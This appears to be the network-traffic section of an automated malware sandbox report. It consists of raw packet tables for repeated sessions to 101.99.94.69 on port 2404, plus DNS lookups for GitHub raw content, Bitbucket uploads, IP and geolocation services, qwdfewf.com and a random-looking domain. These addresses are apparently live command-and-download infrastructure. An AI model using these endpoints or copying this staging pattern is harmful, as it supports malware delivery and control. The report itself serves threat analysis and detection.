                                                                                                                                                                                        Oct 10, 2024 13:40:05.886900902 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:05.886921883 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:05.886938095 CEST498982404192.168.2.9101.99.94.69
                                                                                                                                                                                        Oct 10, 2024 13:40:05.887255907 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:05.887273073 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:05.887284040 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:05.887315989 CEST498982404192.168.2.9101.99.94.69
                                                                                                                                                                                        Oct 10, 2024 13:40:05.887341022 CEST498982404192.168.2.9101.99.94.69
                                                                                                                                                                                        Oct 10, 2024 13:40:05.887397051 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:05.887408018 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:05.887418032 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:05.887443066 CEST498982404192.168.2.9101.99.94.69
                                                                                                                                                                                        Oct 10, 2024 13:40:05.887895107 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:05.887936115 CEST498982404192.168.2.9101.99.94.69
                                                                                                                                                                                        Oct 10, 2024 13:40:05.887938023 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:05.887988091 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:05.887999058 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:05.888034105 CEST498982404192.168.2.9101.99.94.69
                                                                                                                                                                                        Oct 10, 2024 13:40:05.888037920 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:05.888047934 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:05.888076067 CEST498982404192.168.2.9101.99.94.69
                                                                                                                                                                                        Oct 10, 2024 13:40:05.996231079 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:05.996371031 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:05.996448994 CEST498982404192.168.2.9101.99.94.69
                                                                                                                                                                                        Oct 10, 2024 13:40:05.996471882 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:05.996515989 CEST498982404192.168.2.9101.99.94.69
                                                                                                                                                                                        Oct 10, 2024 13:40:05.996520996 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:05.996532917 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:05.996572971 CEST498982404192.168.2.9101.99.94.69
                                                                                                                                                                                        Oct 10, 2024 13:40:05.996624947 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:05.996637106 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:05.996646881 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:05.996656895 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:05.996671915 CEST498982404192.168.2.9101.99.94.69
                                                                                                                                                                                        Oct 10, 2024 13:40:05.996690035 CEST498982404192.168.2.9101.99.94.69
                                                                                                                                                                                        Oct 10, 2024 13:40:05.996826887 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:05.996838093 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:05.996875048 CEST498982404192.168.2.9101.99.94.69
                                                                                                                                                                                        Oct 10, 2024 13:40:05.997323990 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:05.997337103 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:05.997347116 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:05.997385979 CEST498982404192.168.2.9101.99.94.69
                                                                                                                                                                                        Oct 10, 2024 13:40:05.997420073 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:05.997430086 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:05.997467041 CEST498982404192.168.2.9101.99.94.69
                                                                                                                                                                                        Oct 10, 2024 13:40:05.997719049 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:05.997757912 CEST498982404192.168.2.9101.99.94.69
                                                                                                                                                                                        Oct 10, 2024 13:40:05.997762918 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:05.997775078 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:05.997802019 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:05.997811079 CEST498982404192.168.2.9101.99.94.69
                                                                                                                                                                                        Oct 10, 2024 13:40:06.101454973 CEST498982404192.168.2.9101.99.94.69
                                                                                                                                                                                        Oct 10, 2024 13:40:06.495230913 CEST499132404192.168.2.9101.99.94.69
                                                                                                                                                                                        Oct 10, 2024 13:40:06.500199080 CEST240449913101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:06.697706938 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:06.744303942 CEST499142404192.168.2.9101.99.94.69
                                                                                                                                                                                        Oct 10, 2024 13:40:06.746665955 CEST499142404192.168.2.9101.99.94.69
                                                                                                                                                                                        Oct 10, 2024 13:40:06.749248981 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:06.749262094 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:06.749272108 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:06.749311924 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:06.749321938 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:06.749330997 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:06.749425888 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:06.749437094 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:06.749502897 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:06.749515057 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:06.749596119 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:06.749604940 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:06.749666929 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:06.749675989 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:06.751548052 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:06.751558065 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:06.751626968 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:06.751642942 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:06.751652002 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:06.751672983 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:06.751693010 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:06.751702070 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:06.751710892 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:07.598903894 CEST499132404192.168.2.9101.99.94.69
                                                                                                                                                                                        Oct 10, 2024 13:40:07.604091883 CEST240449913101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:07.801285982 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:07.835786104 CEST499142404192.168.2.9101.99.94.69
                                                                                                                                                                                        Oct 10, 2024 13:40:07.837523937 CEST499142404192.168.2.9101.99.94.69
                                                                                                                                                                                        Oct 10, 2024 13:40:07.840670109 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:07.840684891 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:07.840737104 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:07.840745926 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:07.840784073 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:07.840792894 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:07.840857029 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:07.840866089 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:07.840924025 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:07.840933084 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:07.840997934 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:07.841008902 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:07.841072083 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:07.841080904 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:07.842459917 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:07.842470884 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:07.842504025 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:07.842513084 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:07.842588902 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:07.842598915 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:07.842638016 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:07.842647076 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:07.842655897 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:07.872045994 CEST240449888101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:08.023355961 CEST498882404192.168.2.9101.99.94.69
                                                                                                                                                                                        Oct 10, 2024 13:40:08.062875032 CEST240449888101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:08.132735968 CEST498882404192.168.2.9101.99.94.69
                                                                                                                                                                                        Oct 10, 2024 13:40:08.178890944 CEST498882404192.168.2.9101.99.94.69
                                                                                                                                                                                        Oct 10, 2024 13:40:08.183712959 CEST240449888101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:08.682229996 CEST498982404192.168.2.9101.99.94.69
                                                                                                                                                                                        Oct 10, 2024 13:40:08.687150002 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:08.687166929 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:08.687182903 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:08.687191963 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:08.687217951 CEST498982404192.168.2.9101.99.94.69
                                                                                                                                                                                        Oct 10, 2024 13:40:08.687228918 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:08.687238932 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:08.687247038 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:08.687253952 CEST498982404192.168.2.9101.99.94.69
                                                                                                                                                                                        Oct 10, 2024 13:40:08.687371969 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:08.687381029 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:08.687416077 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:08.691998959 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:08.692060947 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:08.692070007 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:08.692085028 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:08.692092896 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:08.692102909 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:08.692399979 CEST240449898101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:08.692440033 CEST498982404192.168.2.9101.99.94.69
                                                                                                                                                                                        Oct 10, 2024 13:40:08.734786987 CEST499132404192.168.2.9101.99.94.69
                                                                                                                                                                                        Oct 10, 2024 13:40:08.739603043 CEST240449913101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:08.936857939 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:08.994302988 CEST499142404192.168.2.9101.99.94.69
                                                                                                                                                                                        Oct 10, 2024 13:40:08.996334076 CEST499142404192.168.2.9101.99.94.69
                                                                                                                                                                                        Oct 10, 2024 13:40:08.999917030 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:08.999933004 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:08.999944925 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:08.999993086 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:09.000006914 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:09.000015020 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:09.000062943 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:09.000072002 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:09.000112057 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:09.000122070 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:09.000195026 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:09.000202894 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:09.000231981 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:09.000296116 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:09.001410961 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:09.001420021 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:09.001478910 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:09.001487017 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:09.001522064 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:09.001530886 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:09.001569033 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:09.001578093 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:09.001594067 CEST240449914101.99.94.69192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:23.555136919 CEST498882404192.168.2.9101.99.94.69
                                                                                                                                                                                        Oct 10, 2024 13:40:23.555588961 CEST4990480192.168.2.9178.237.33.50
                                                                                                                                                                                        Oct 10, 2024 13:40:23.555702925 CEST499132404192.168.2.9101.99.94.69
                                                                                                                                                                                        Oct 10, 2024 13:40:23.555752039 CEST499142404192.168.2.9101.99.94.69
                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                        Oct 10, 2024 13:39:34.836503029 CEST5186853192.168.2.91.1.1.1
                                                                                                                                                                                        Oct 10, 2024 13:39:34.892760038 CEST53518681.1.1.1192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:39.769161940 CEST6360353192.168.2.91.1.1.1
                                                                                                                                                                                        Oct 10, 2024 13:39:39.775690079 CEST53636031.1.1.1192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:41.074520111 CEST5076653192.168.2.91.1.1.1
                                                                                                                                                                                        Oct 10, 2024 13:39:41.096051931 CEST53507661.1.1.1192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:42.754082918 CEST5876453192.168.2.91.1.1.1
                                                                                                                                                                                        Oct 10, 2024 13:39:42.761173010 CEST53587641.1.1.1192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:43.237149000 CEST6133353192.168.2.91.1.1.1
                                                                                                                                                                                        Oct 10, 2024 13:39:43.688627958 CEST53613331.1.1.1192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:56.674319983 CEST5001553192.168.2.91.1.1.1
                                                                                                                                                                                        Oct 10, 2024 13:39:56.682203054 CEST53500151.1.1.1192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:57.791610003 CEST6378853192.168.2.91.1.1.1
                                                                                                                                                                                        Oct 10, 2024 13:39:57.800730944 CEST53637881.1.1.1192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:00.745017052 CEST5358453192.168.2.91.1.1.1
                                                                                                                                                                                        Oct 10, 2024 13:40:00.757574081 CEST53535841.1.1.1192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:01.576817036 CEST4960153192.168.2.91.1.1.1
                                                                                                                                                                                        Oct 10, 2024 13:40:01.584534883 CEST53496011.1.1.1192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:40:25.791256905 CEST5893553192.168.2.91.1.1.1
                                                                                                                                                                                        Oct 10, 2024 13:40:25.800693035 CEST53589351.1.1.1192.168.2.9
                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                        Oct 10, 2024 13:39:34.836503029 CEST192.168.2.91.1.1.10x4dc2Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                        Oct 10, 2024 13:39:39.769161940 CEST192.168.2.91.1.1.10x1dfdStandard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                        Oct 10, 2024 13:39:41.074520111 CEST192.168.2.91.1.1.10x2669Standard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                                                                                        Oct 10, 2024 13:39:42.754082918 CEST192.168.2.91.1.1.10xd04aStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                        Oct 10, 2024 13:39:43.237149000 CEST192.168.2.91.1.1.10x80aeStandard query (0)qwdfewf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                        Oct 10, 2024 13:39:56.674319983 CEST192.168.2.91.1.1.10x86dbStandard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                        Oct 10, 2024 13:39:57.791610003 CEST192.168.2.91.1.1.10x1055Standard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                                                                                        Oct 10, 2024 13:40:00.745017052 CEST192.168.2.91.1.1.10xceb7Standard query (0)KIVYliOyxsOz.KIVYliOyxsOzA (IP address)IN (0x0001)false
                                                                                                                                                                                        Oct 10, 2024 13:40:01.576817036 CEST192.168.2.91.1.1.10x23aeStandard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                                                                                                        Oct 10, 2024 13:40:25.791256905 CEST192.168.2.91.1.1.10x104bStandard query (0)KIVYliOyxsOz.KIVYliOyxsOzA (IP address)IN (0x0001)false
                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                        Oct 10, 2024 13:39:29.414252996 CEST1.1.1.1192.168.2.90x327dNo error (0)shed.dual-low.s-part-0023.t-0009.t-msedge.nets-part-0023.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                        Oct 10, 2024 13:39:29.414252996 CEST1.1.1.1192.168.2.90x327dNo error (0)s-part-0023.t-0009.t-msedge.net13.107.246.51A (IP address)IN (0x0001)false
                                                                                                                                                                                        Oct 10, 2024 13:39:34.892760038 CEST1.1.1.1192.168.2.90x4dc2No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                                                                        Oct 10, 2024 13:39:34.892760038 CEST1.1.1.1192.168.2.90x4dc2No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                                                                        Oct 10, 2024 13:39:34.892760038 CEST1.1.1.1192.168.2.90x4dc2No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                                                                        Oct 10, 2024 13:39:34.892760038 CEST1.1.1.1192.168.2.90x4dc2No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                                                                        Oct 10, 2024 13:39:39.775690079 CEST1.1.1.1192.168.2.90x1dfdNo error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                                                                                                                                                                        Oct 10, 2024 13:39:39.775690079 CEST1.1.1.1192.168.2.90x1dfdNo error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
                                                                                                                                                                                        Oct 10, 2024 13:39:39.775690079 CEST1.1.1.1192.168.2.90x1dfdNo error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                                                                                                                                                                        Oct 10, 2024 13:39:41.096051931 CEST1.1.1.1192.168.2.90x2669No error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                        Oct 10, 2024 13:39:41.096051931 CEST1.1.1.1192.168.2.90x2669No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                        Oct 10, 2024 13:39:41.096051931 CEST1.1.1.1192.168.2.90x2669No error (0)s3-w.us-east-1.amazonaws.com52.217.171.225A (IP address)IN (0x0001)false
                                                                                                                                                                                        Oct 10, 2024 13:39:41.096051931 CEST1.1.1.1192.168.2.90x2669No error (0)s3-w.us-east-1.amazonaws.com52.217.235.113A (IP address)IN (0x0001)false
                                                                                                                                                                                        Oct 10, 2024 13:39:41.096051931 CEST1.1.1.1192.168.2.90x2669No error (0)s3-w.us-east-1.amazonaws.com16.15.176.162A (IP address)IN (0x0001)false
                                                                                                                                                                                        Oct 10, 2024 13:39:41.096051931 CEST1.1.1.1192.168.2.90x2669No error (0)s3-w.us-east-1.amazonaws.com3.5.0.84A (IP address)IN (0x0001)false
                                                                                                                                                                                        Oct 10, 2024 13:39:41.096051931 CEST1.1.1.1192.168.2.90x2669No error (0)s3-w.us-east-1.amazonaws.com16.182.39.193A (IP address)IN (0x0001)false
                                                                                                                                                                                        Oct 10, 2024 13:39:41.096051931 CEST1.1.1.1192.168.2.90x2669No error (0)s3-w.us-east-1.amazonaws.com16.15.176.73A (IP address)IN (0x0001)false
                                                                                                                                                                                        Oct 10, 2024 13:39:41.096051931 CEST1.1.1.1192.168.2.90x2669No error (0)s3-w.us-east-1.amazonaws.com3.5.20.206A (IP address)IN (0x0001)false
                                                                                                                                                                                        Oct 10, 2024 13:39:41.096051931 CEST1.1.1.1192.168.2.90x2669No error (0)s3-w.us-east-1.amazonaws.com54.231.140.193A (IP address)IN (0x0001)false
                                                                                                                                                                                        Oct 10, 2024 13:39:42.761173010 CEST1.1.1.1192.168.2.90xd04aNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                                                                                        Oct 10, 2024 13:39:42.761173010 CEST1.1.1.1192.168.2.90xd04aNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                                                                                        Oct 10, 2024 13:39:42.761173010 CEST1.1.1.1192.168.2.90xd04aNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                                                                                        Oct 10, 2024 13:39:43.688627958 CEST1.1.1.1192.168.2.90x80aeNo error (0)qwdfewf.com185.185.71.79A (IP address)IN (0x0001)false
                                                                                                                                                                                        Oct 10, 2024 13:39:56.682203054 CEST1.1.1.1192.168.2.90x86dbNo error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                                                                                                                                                                        Oct 10, 2024 13:39:56.682203054 CEST1.1.1.1192.168.2.90x86dbNo error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
                                                                                                                                                                                        Oct 10, 2024 13:39:56.682203054 CEST1.1.1.1192.168.2.90x86dbNo error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                                                                                                                                                                        Oct 10, 2024 13:39:57.800730944 CEST1.1.1.1192.168.2.90x1055No error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                        Oct 10, 2024 13:39:57.800730944 CEST1.1.1.1192.168.2.90x1055No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                        Oct 10, 2024 13:39:57.800730944 CEST1.1.1.1192.168.2.90x1055No error (0)s3-w.us-east-1.amazonaws.com3.5.10.196A (IP address)IN (0x0001)false
                                                                                                                                                                                        Oct 10, 2024 13:39:57.800730944 CEST1.1.1.1192.168.2.90x1055No error (0)s3-w.us-east-1.amazonaws.com52.216.50.241A (IP address)IN (0x0001)false
                                                                                                                                                                                        Oct 10, 2024 13:39:57.800730944 CEST1.1.1.1192.168.2.90x1055No error (0)s3-w.us-east-1.amazonaws.com54.231.161.49A (IP address)IN (0x0001)false
                                                                                                                                                                                        Oct 10, 2024 13:39:57.800730944 CEST1.1.1.1192.168.2.90x1055No error (0)s3-w.us-east-1.amazonaws.com54.231.224.9A (IP address)IN (0x0001)false
                                                                                                                                                                                        Oct 10, 2024 13:39:57.800730944 CEST1.1.1.1192.168.2.90x1055No error (0)s3-w.us-east-1.amazonaws.com52.216.186.19A (IP address)IN (0x0001)false
                                                                                                                                                                                        Oct 10, 2024 13:39:57.800730944 CEST1.1.1.1192.168.2.90x1055No error (0)s3-w.us-east-1.amazonaws.com52.217.123.105A (IP address)IN (0x0001)false
                                                                                                                                                                                        Oct 10, 2024 13:39:57.800730944 CEST1.1.1.1192.168.2.90x1055No error (0)s3-w.us-east-1.amazonaws.com16.182.68.137A (IP address)IN (0x0001)false
                                                                                                                                                                                        Oct 10, 2024 13:39:57.800730944 CEST1.1.1.1192.168.2.90x1055No error (0)s3-w.us-east-1.amazonaws.com3.5.28.124A (IP address)IN (0x0001)false
                                                                                                                                                                                        Oct 10, 2024 13:40:00.757574081 CEST1.1.1.1192.168.2.90xceb7Name error (3)KIVYliOyxsOz.KIVYliOyxsOznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                        Oct 10, 2024 13:40:01.584534883 CEST1.1.1.1192.168.2.90x23aeNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                                                                                        Oct 10, 2024 13:40:25.800693035 CEST1.1.1.1192.168.2.90x104bName error (3)KIVYliOyxsOz.KIVYliOyxsOznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                        Oct 10, 2024 13:42:12.137577057 CEST1.1.1.1192.168.2.90x4224No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                        Oct 10, 2024 13:42:12.137577057 CEST1.1.1.1192.168.2.90x4224No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                        • raw.githubusercontent.com
                                                                                                                                                                                        • bitbucket.org
                                                                                                                                                                                        • bbuseruploads.s3.amazonaws.com
